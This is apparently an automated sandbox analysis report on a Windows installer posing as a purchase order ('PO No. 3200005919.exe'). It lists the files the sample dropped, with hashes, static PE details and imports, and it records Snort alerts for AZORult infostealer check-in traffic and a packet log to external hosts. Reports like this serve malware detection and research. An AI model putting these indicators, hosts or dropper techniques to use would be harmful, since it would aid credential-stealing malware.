C:\Users\user\AppData\Local\Temp\94EA6FBC\vcruntime140.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83784
Entropy (8bit):	6.890347360270656
Encrypted:	false
SSDEEP:	1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsh409.tmp\System.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	11776
Entropy (8bit):	5.659384359264642
Encrypted:	false
SSDEEP:	192:ex24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlESlS:h8QIl972eXqlWBFSt273YOlEz
MD5:	8B3830B9DBF87F84DDD3B26645FED3A0
SHA1:	223BEF1F19E644A610A0877D01EADC9E28299509
SHA-256:	F004C568D305CD95EDBD704166FCD2849D395B595DFF814BCC2012693527AC37
SHA-512:	D13CFD98DB5CA8DC9C15723EEE0E7454975078A776BCE26247228BE4603A0217E166058EBADC68090AFE988862B7514CB8CB84DE13B3DE35737412A6F0A8AC03
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....uY...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..`....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Afskede\Hitherunto\Sale\Swedish.ini

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	3296
Entropy (8bit):	3.4113461059426067
Encrypted:	false
SSDEEP:	96:rLAi578zFA1TbATYHGzrSCICl2Pih5A9EE9EaiFy:fP57nlATYHyrSV5S5AfZ
MD5:	419178A0AA370FC69EFC1A54202CBFAC
SHA1:	BCACA6EB056D92BF2E4ABACCA16ACD80CA055BE6
SHA-256:	9C5948468DD8ADA15A36D7A1F7F5BC9563B7C7602A9BFB3CDC1B70F40C67DE36
SHA-512:	93FFD54400BBECD18D7EE69116364DDC2075E34294B9769880C53DB6DF3B0837A3E0590B0584EB3B79882BD66D8D9451E9014D33D8AD61C246E1EFDA65971BF8
Malicious:	false
Preview:	..[.T.r.a.n.s.l.a.t.i.o.n.s.].....R.O.G. .X.G. .M.o.b.i.l.e. .p.l.u.g.g.e.d.-.i.n. .=.R.O.G. .X.G. .M.o.b.i.l.e. ...r. .a.n.s.l.u.t.e.n.....P.u.s.h. .t.h.e. .".U.n.l.o.c.k. .S.w.i.t.c.h.". .o.n. .t.o.p. .o.f. .t.h.e. .p.l.u.g. .t.o. .l.o.c.k. .y.o.u.r. .c.a.b.l.e. .i.n. .p.l.a.c.e...=.T.r.y.c.k. .p... .l...s.k.n.a.p.p.e.n. .o.v.a.n.f...r. .k.o.n.t.a.k.t.e.n. .f...r. .a.t.t. .l...s.a. .f.a.s.t. .k.a.b.e.l.n.......D.o.n.'.t. .s.h.o.w. .t.h.i.s. .m.e.s.s.a.g.e. .a.g.a.i.n.=.V.i.s.a. .i.n.t.e. .d.e.t. .h...r. .m.e.d.d.e.l.a.n.d.e.t. .i.g.e.n.....O.K.=.O.K.....C.a.n.c.e.l.=.A.v.b.r.y.t.....A.c.t.i.v.a.t.e. .t.h.e. .R.O.G. .X.G. .M.o.b.i.l.e.=.A.k.t.i.v.e.r.a. .R.O.G. .X.G. .M.o.b.i.l.e.....D.e.a.c.t.i.v.a.t.e. .t.h.e. .R.O.G. .X.G. .M.o.b.i.l.e.=.I.n.a.k.t.i.v.e.r.a. .R.O.G. .X.G. .M.o.b.i.l.e.....C.l.i.c.k. .O.K. .t.o. .s.w.i.t.c.h. .t.o. .t.h.e. .R.O.G. .X.G. .M.o.b.i.l.e...=.K.l.i.c.k.a. .p... .O.K. .f...r. .a.t.t. .b.y.t.a. .t.i.l.l. .R.O.G. .X.G. .M.o.b.i.l.e.......C.l.i.c.k. .O.K. .t.

C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Airward.Sav

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	Java JCE KeyStore
Category:	dropped
Size (bytes):	163026
Entropy (8bit):	6.663116548350503
Encrypted:	false
SSDEEP:	3072:i33VZ54T8JgMEU0pR3e6aahDHuP0IXt0dQ4SUy:OVZ54HMJCRO6RFFNL9y
MD5:	DD964C96ACC8FC51404B2205E7E740BD
SHA1:	81396D8F7BC367620BB127671CC324F63730B05F
SHA-256:	B42CF7F21B859E1C5D2ACE876913738A979DBF5FE9D4F5BAFFDFF60A0577FCE3
SHA-512:	6554D0BB128D204FD434D7E04C23DCEE55DD4DA8EE08433D54B8DF7690C9F3A8FF284A7F7023F889ABA798582BFC665E612958DD2D85374F37D3F82FF73C765E
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Circularizations126\Iltningernes\Mellivorous\Oncosis.syl

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	data
Category:	dropped
Size (bytes):	100097
Entropy (8bit):	7.998148981940183
Encrypted:	true
SSDEEP:	1536:iHaaOtGX0NzHwQMkIhF5kPtF/c2xo10IKCxvEYiCOw3u3ASAlNs9LHLpKvnO8:pryszHOhbWplCOE0uGLHLcm8
MD5:	115DDC0D007BC8ACA7678133CDF5B024
SHA1:	EED3949E406842152A374530E8971C52CB68ED8A
SHA-256:	17EABBA40E488BE3A65E30F5ABFA82F4C1E119C3EF484C2C39E9C95E993CA248
SHA-512:	622B9CD498B1AE71457CFC3094667077A5281BC1FEAA04789FC8F2B3FE641EF3F205D6DBE900E18C9A555866DD1FD00A6080827653225FA45AE9C1300C66244C
Malicious:	false
Preview:	2=..g.e.S......2..H>m........k........)_.q.6.R..B....~:....Eh.7.8q."..CE.5..)e.e"..^.Z..d8#..n0...7....K......)Z.8."..L...9.b.KQ?.)U.8.euF.....&........./...bQ.N...0.t.,.....YT...?0...H..E. .v.po.+....{.U.E..#......@7\.(.[+..K1...#....\|.......b.@../I7...S.......X...2.dx.l..:..xtR...h..\|9.+e..&....0...l8-..!.....Gw;0l...j.L`..L.^.%..G..U....e.Y..t.7.X...4^k.G......'S..?..7.&.,...j...<r..OU G.A=.`.h.~....)..1..o..\|.Y.X...:...A.}...1.[{.]S...y....sE.:....c..~.Z&6V........`...%..)gm.fc.`...8.!.."._.Q....Rmrw&..V..~.p.:..0......AF...U..%=>S]{....8..o.9.a.........0_.a.b.X....{....=m....k......._M.......0..JG...r.._+3h....B..ECC.Q..0......e...6.8.....o{!.........P'g..WZx.....2GC!k._..p}:..1l.?mX..iP<=..Z.d..7.3.X...... `.H.9.....@yY..Q'..\|H3..q......-....].....C../..s..\|.......h.z.E....IA...URZ..=..H.;..+#....g.........$...y..EN}.@...Q.Y#.0GL..U)F6..`.(...+.O......e%....h..V...5..s.D.\|p:.....i.W.;.x....?..,.....lv*\.a....\|.G..."..K..!P.n..

C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Circularizations126\Iltningernes\Mellivorous\WMIMethod.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	106536
Entropy (8bit):	6.014036571306393
Encrypted:	false
SSDEEP:	1536:Uu0DxbI1QwdCVQiZSGMwd1v9gL2ZJeIAsW1IEd09dllZ05PD/tbXZJ+NPE1H:URxIawUGiZ7M6VgLMII4JM50PbXiNPMH
MD5:	93FBA0E88958082664890BA74C8463E3
SHA1:	11C4F155494FB93232719AF3BA173EAC6F781CD8
SHA-256:	5C8B1D73B57905CB0024B6B00136363BEEF051ED8E1F0EFC7BC72F565AF06175
SHA-512:	6A13C83F5176FF78E16E98CFD155C5263CD2E1CFD1E00FABF13B8E85D426A4437F92D17559691FE149CDD7376AEF8573E0167B1BDECF999E31FC665412A86B20
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y.k..k..k....+.k....+.k....+%k....+.k....+.k....+.k....+.k..k..k....+.k....+.k...i.k..k..k....+.k.Rich.k.........PE..d....8.a.........." ......................................................................`..........................................[..\|....\..(....... .......4....~..("......X...XF..p............................F..8...............(............................text............................... ..`.rdata..n...........................@..@.data...h....p.......R..............@....pdata..4............^..............@..@_RDATA...............n..............@..@.rsrc... ............p..............@..@.reloc..X............v..............@..B................................................................................................................................................................................................

C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Circularizations126\Iltningernes\Mellivorous\qipcap.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	16824
Entropy (8bit):	6.421949257045276
Encrypted:	false
SSDEEP:	192:fvcU3c5wjYguwJba7RXAQV01eSKMP7x0KDWpH4AAANa3JZHSVMyMt:fvVkeYpwJKRn61jKMNvDG/GhqMys
MD5:	2D75C46C8030F312DFC2F56A0E016692
SHA1:	F95F12C987AF20A69BA05088B2F9E4F4BEC445AE
SHA-256:	AADD6DE734D7585D23833BA5C303313ED2273B2BD3D1B4B7BA55ABC1366FD8DD
SHA-512:	C0F0F07E6BA4A6676B753EC3613AC388DE88F32D508CB1B9BD8521FBF192889232B4722756DDC72A46B0AC4A4BFB48F26E06651E64CF3D31EB8F82134A5D3671
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...&.#b.........."!................P........................................p.......g....@A................................(!..P....P...............".......`..4.... ............................... ...............!..h............................text............................... ..`.rdata..$.... ......................@..@.data........0......................@....00cfg.......@......................@..@.rsrc........P......................@..@.reloc..4....`....... ..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\leprousness.lnk

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Category:	dropped
Size (bytes):	840
Entropy (8bit):	3.3700691322951384
Encrypted:	false
SSDEEP:	12:8wl01Rm/3BVkUnDyXdICRDufdpUPu7dI5ST5D0TL6CNbw4t2YCBTo8:8S/BTD3YDuL3I50B2bIJT
MD5:	FCFA8E3FCF1A0053D44C9D269EB41E40
SHA1:	3558529A9DB458F029D784E56ABC8F7F94666D2E
SHA-256:	DBF2655D8984EDF18B4B9CBD4AA7C42F4A2AEFDABAA594819704D8212EF22435
SHA-512:	40F7A8A90F6AE01DA1BFDC7BF656C94E3F52695E2EFF8FBCEF110724C6D545342D8634D06A06BEEEF8A15B5DABBC6C750611EAE95D511EE9ACB75FC287A56782
Malicious:	false
Preview:	L..................F........................................................=....P.O. .:i.....+00.../C:\...................V.1...........Windows.@............................................W.i.n.d.o.w.s.....P.1...........Fonts.<............................................F.o.n.t.s.....h.2...........Tolknings.Fin.L............................................T.o.l.k.n.i.n.g.s...F.i.n...........\.F.o.n.t.s.\.T.o.l.k.n.i.n.g.s...F.i.n.c.C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.O.v.e.r.f.u.r.n.i.s.h.e.d.\.T.u.b.e.r.c.u.l.i.s.a.t.i.o.n.\.W.o.o.d.w.o.s.e.\.C.i.r.c.u.l.a.r.i.z.a.t.i.o.n.s.1.2.6.\.I.l.t.n.i.n.g.e.r.n.e.s.\.M.e.l.l.i.v.o.r.o.u.s.........$..................C..B..g..(.#................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.8.2.2.2.4.1.4.-.1.0.0.1.................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.575298268219731
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PO No. 3200005919.exe
File size:	373461
MD5:	9453cdcf8221341d06bac47b8ab3aa19
SHA1:	c35a23cdc61eb42594e1a39a23ccae06399263c0
SHA256:	7490acc48d1659234d61c1716c0d549880a98375f502502b60dcc71b49f7f14f
SHA512:	d37774b11400256fb4fe21b1e298f90274b0c83f2b0f90bc7c5d2a6ed3e0edb276bc49df8f65b0099f1d0ce6c4abac277805adf590971e277d1c1e15fd1190cd
SSDEEP:	6144:8Iw37uc96d+riI5FhrmKugnyj/wFW+hy88BSFz0PALceeozAs9k:pld6f5Ftgayj/kW+hyRYBVce3k5
TLSH:	2F84BF2F711D505ED917353266AEF0AA2B597C8B2B71E8164BA37DDF94F07200A0FB02
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....uY.................d...*.....

File Icon


Icon Hash:	e0f0f0d0d8c0f81e

Static PE Info

General

Entrypoint:	0x403489
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5975952E [Mon Jul 24 06:35:26 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	1f23f452093b5c1ff091a2f9fb4fa3e9

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A230h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080ACh]
call dword ptr [004080A8h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042A24Ch], eax
je 00007F8370619723h
push ebx
call 00007F837061C9D1h
cmp eax, ebx
je 00007F8370619719h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007F837061C94Bh
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F83706196FCh
push 0000000Ah
call 00007F837061C9A4h
push 00000008h
call 00007F837061C99Dh
push 00000006h
mov dword ptr [0042A244h], eax
call 00007F837061C991h
cmp eax, ebx
je 00007F8370619721h
push 0000001Eh
call eax
test eax, eax
je 00007F8370619719h
or byte ptr [0042A24Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [0042A318h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 004216E8h
call dword ptr [00408188h]
push 0040A384h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x60000	0x10890	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x63d1	0x6400	False	0.66515625	data	6.479451209065	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x138e	0x1400	False	0.45	data	5.143831732151552	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20358	0x600	False	0.501953125	data	4.000739070159718	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x35000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x60000	0x10890	0x10a00	False	0.19385867011278196	data	3.7626047476334135	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_BITMAP	0x603e8	0x368	Device independent bitmap graphic, 96 x 16 x 4, image size 768	English	United States
RT_ICON	0x60750	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States
RT_ICON	0x65bd8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States
RT_ICON	0x69e00	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States
RT_ICON	0x6c3a8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States
RT_ICON	0x6d450	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States
RT_ICON	0x6e2f8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States
RT_ICON	0x6ec80	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States
RT_ICON	0x6f528	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States
RT_ICON	0x6fa90	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States
RT_DIALOG	0x6fef8	0x144	data	English	United States
RT_DIALOG	0x70040	0x13c	data	English	United States
RT_DIALOG	0x70180	0x100	data	English	United States
RT_DIALOG	0x70280	0x11c	data	English	United States
RT_DIALOG	0x703a0	0xc4	data	English	United States
RT_DIALOG	0x70468	0x60	data	English	United States
RT_GROUP_ICON	0x704c8	0x84	data	English	United States
RT_MANIFEST	0x70550	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	ExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.11.20104.21.2.649830802029468 11/28/22-16:37:02.608409	TCP	2029468	ET TROJAN Win32/AZORult V3.3 Client Checkin M15	49830	80	192.168.11.20	104.21.2.6
104.21.2.6192.168.11.2080498302029137 11/28/22-16:37:03.671390	TCP	2029137	ET TROJAN AZORult v3.3 Server Response M2	80	49830	104.21.2.6	192.168.11.20

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 28, 2022 16:37:02.208327055 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.258344889 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.258560896 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.259182930 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.309118986 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.334062099 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.334155083 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.334222078 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.334285021 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.334330082 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.334350109 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.334397078 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.334397078 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.334414005 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.334484100 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.334547997 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.334546089 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.334610939 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.334673882 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.334706068 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.334706068 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.334882021 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.334882021 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.384736061 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.384824038 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.384953022 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.385019064 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.385050058 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.385051012 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.385119915 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.385164022 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.385210991 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.385349989 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.385399103 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.385436058 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.385519028 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.385656118 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.385687113 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.385814905 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.385854006 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.385967016 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.386049032 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.386059999 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.386130095 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.386153936 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.386209011 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.386260033 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.386336088 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.386370897 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.386419058 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.386428118 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.386492014 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.386526108 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.386573076 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.386614084 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.386689901 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.386735916 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.386774063 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.386790991 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.386869907 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.386873960 CET	80	49829	86.109.170.4	192.168.11.20
Nov 28, 2022 16:37:02.386997938 CET	49829	80	192.168.11.20	86.109.170.4
Nov 28, 2022 16:37:02.387049913 CET	49829	80	192.168.11.20	86.109.170.4
